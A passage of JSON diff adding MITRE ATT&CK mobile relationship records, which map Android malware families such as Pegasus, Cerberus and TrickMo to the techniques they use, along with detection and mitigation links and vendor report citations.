(2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:13:18.720Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) accesses call logs.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--027a36dc-cd9e-4282-b101-b9a0abbb312f", + "type": "relationship", + "created": "2020-09-11T14:54:16.640Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T14:54:16.640Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can encrypt exfiltrated data.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--56a255a5-9fa2-45bb-8848-fd0a68514467", + "created": "2022-04-11T20:06:56.034Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-11T20:06:56.034Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--2f0e8d80-4b8b-4f4a-b5cc-132afe7e057d", + "target_ref": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--42624ee9-1bf5-46aa-87d0-9fda0de9a06e", + "created": "2020-06-26T15:32:24.921Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:50:47.973Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) avoids being analyzed by only activating the malware after recording a certain number of steps from the accelerometer.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--22773074-4a95-48e0-905f-688ce048b5ed", + "created": "2020-04-24T17:46:31.593Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020.", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:53:51.524Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can prevent the user from interacting with the UI by showing a WebView with a persistent cursor.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--acf8fd2a-dc98-43b4-8d37-64e10728e591", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--61550ef4-41f0-4354-af5c-f47db8aca654", + "type": "relationship", + "created": "2020-06-02T14:32:31.910Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-02T14:32:31.910Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can collect the device’s phone number, ICCID, IMEI, and the currently active network interface (Wi-Fi or cellular).(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--681161b2-4e30-4d49-8524-6cc0d94585cb", + "created": "2023-03-16T13:33:26.925Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T13:33:26.925Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "target_ref": "attack-pattern--939808a7-121d-467a-b028-4441ee8b7cee", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bb11b7d1-e661-49af-9746-9fa4c56324bf", + "created": "2023-03-20T18:59:14.759Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:59:14.759Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--295fab07-9f02-4504-9ae4-1a60c2e8c224", + "type": "relationship", + "created": "2019-09-03T20:08:00.670Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "source_name": "Talos Gustuff Apr 2019" + } + ], + "modified": "2019-10-10T15:19:47.960Z", + "description": " [Gustuff](https://attack.mitre.org/software/S0406) can capture files and photos from the compromised device.(Citation: Talos Gustuff Apr 2019) ", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--52ad5145-3b04-4cc8-bed8-4a14501afe25", + "type": "relationship", + "created": "2020-09-11T15:55:43.774Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2020-09-11T15:55:43.774Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) deletes incoming SMS messages from specified numbers, including those that contain particular strings.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c438b973-c2f3-43fc-8312-2a5bbde4facb", + "created": "2023-03-20T18:43:03.537Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:43:03.537Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4220ec84-3c30-462b-9bad-4fb4de42cfd4", + "created": "2022-04-06T15:28:20.249Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be instructed to not grant applications unexpected or unnecessary permissions. ", + "modified": "2022-04-06T15:28:20.249Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--59e225fa-b181-4906-9f0b-ef8f6ce7f2ef", + "created": "2022-04-05T20:14:17.442Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T20:14:17.442Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303", + "target_ref": "attack-pattern--ed2c05a1-4f81-4d97-9e1b-aff01c34ae84", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--901492b5-b074-4631-ad6e-4178caa4164a", + "type": "relationship", + "created": "2020-12-24T22:04:28.017Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T22:04:28.017Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has recorded calls and environment audio in .amr format.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fb3b32a8-6422-4d44-91e3-27a58e569963", + "type": "relationship", + "created": "2019-09-03T19:45:48.494Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-09-11T13:25:19.179Z", + "description": " [Exodus](https://attack.mitre.org/software/S0405) Two can take screenshots of any application in the foreground.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9d621873-6d3c-4660-be9a-57e2e8648236", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Proofpoint-Marcher", + "description": "Proofpoint. (2017, November 3). Credential phishing and an Android banking Trojan combine in Austrian mobile attacks. Retrieved July 6, 2018.", + "url": "https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:24:29.502Z", + "description": "[Marcher](https://attack.mitre.org/software/S0317) requests Android Device Administrator access.(Citation: Proofpoint-Marcher)", + "relationship_type": "uses", + "source_ref": "malware--f9854ba6-989d-43bf-828b-7240b8a65291", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b018fe06-740b-4864-b30a-f047598506b3", + "type": "relationship", + "created": "2020-04-24T15:06:33.510Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T15:06:33.510Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can collect various pieces of device information, including OS version, phone model, and manufacturer.(Citation: TrendMicro Coronavirus Updates) ", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8ea39534-6fe9-404c-94b7-0f320af95404", + "created": "2022-04-01T15:17:21.511Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T15:17:21.511Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--77e30eee-fd48-40b4-99ec-73e97c158b58", + "target_ref": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0b5bfa77-51b4-41b4-ae03-88b585d143c1", + "type": "relationship", + "created": "2020-09-11T14:54:16.650Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T14:54:16.650Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) has been distributed in multiple stages.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8b3e74ad-7cc4-4ed2-84d2-c745e6997711", + "created": "2023-02-06T20:12:17.434Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:04:59.445Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can request the `READ_CALL_LOG` permission.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--021ca5c4-7e8a-439b-8c2e-38f817db63e3", + "created": "2023-02-06T18:50:12.251Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-14T14:40:57.100Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can check device system properties to potentially avoid running while under analysis.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--27b8153c-130e-44a7-84a9-840f4c23e2ea", + "type": "relationship", + "created": "2020-07-15T20:20:59.377Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-07-15T20:20:59.377Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can collect all accounts stored on the device.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ea2ad242-4365-4868-8beb-4a634f3ba6b7", + "type": "relationship", + "created": "2020-11-24T17:55:12.822Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.822Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can request the device’s location.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--789dd0f9-527c-49b3-93b7-851ce4961f0f", + "type": "relationship", + "created": "2019-09-03T19:45:48.492Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-10-14T17:15:52.637Z", + "description": " [Exodus](https://attack.mitre.org/software/S0405) One queries the device for its IMEI code and the phone number in order to validate the target of a new infection.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bd29ce15-1771-470c-a74b-5ea90832ce23", + "created": "2020-12-24T22:04:27.911Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:31:11.269Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has collected SMS messages.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4f812a57-efdc-463b-bf37-baa4bca7502b", + "created": "2020-05-04T14:22:20.348Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020.", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:35:00.081Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can uninstall itself from a device on command by abusing the accessibility service.(Citation: SecurityIntelligence TrickMo) ", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ad723fb0-7439-407e-9bf5-1cb3fd7df8aa", + "created": "2023-02-06T19:05:28.288Z", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-06T19:05:28.288Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can collect files from or inspect the device’s filesystem.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--395cb6b2-0848-43c7-ac4a-617e103fb66a", + "created": "2020-11-20T16:37:28.591Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:02:09.253Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) has communicated with the C2 using MQTT and HTTP.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": 